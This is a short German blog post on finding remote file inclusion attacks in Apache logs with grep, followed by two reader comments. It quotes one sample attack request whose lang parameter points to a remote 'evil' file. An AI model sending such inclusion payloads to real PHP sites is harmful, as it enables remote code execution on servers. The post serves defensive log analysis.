Sicherheitslücken in php-Scripts aufdecken

Mit einem kleinen, aber feinen Befehl kann man seine Apache-Logs nach Remote-File-Inclusion-Attacken durchforsten und anschließend die Dateien sicher, bzw. unschädlich machen.

Leider ist es meistens dann schon zu spät, aber trotzdem sollte man wissen was genau passiert ist.

Die Logfiles Stück für Stück durchgehen wäre ein Wahnsinn, ein praktisches Hilfsmittel ist grep:

grep =http /var/log/apache2/access*

Es werden nun alle Dateien, die im Ordner /var/log/apache2 stecken und mit access anfangen, nach dem Vorkommen ‚=http‘ durchsucht.

Ein Beispiel-Eintrag wäre:

217.172.188.64 - - [22/Oct/2007:10:46:17 +0200] "GET /start.php?lang=http://domain.com/boese.txt? HTTP/1.1" 200 4174 "-" "libwww-perl/5.65"

Hier hat also jemand versucht über die Variable $lang Code einzuschleusen. Würde die Variable nicht überprüft werden (wie hier beschrieben) könnte der Angreifer nun richtig zuschlagen.

2 Antworten auf „Sicherheitslücken in php-Scripts aufdecken“

  1. Hallo,

    als nicht so Linux Fachmann, kann man das evtl. als Script haben, dieses Commando oben, und dann die ausgabe in eine textdatei oder evtl. sogar Email ausgeben, das das z.b. alle Stunde kontrolliert wird und der Admin darüber bescheid bekommt ?

    Wenn das möglich wäre, wäre ich sehr dankbar wenn mir jemand erklären könnte wie, und evtl. an mich per Email schicken.

    Danke im Vorraus.

    Wolfseye

  2. @ Wolfseye
    wenn du an so einem Script immer noch interesiert bist, dann melde dich einfach mal bei mir.

    jumpin . banana at gmail dot com

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.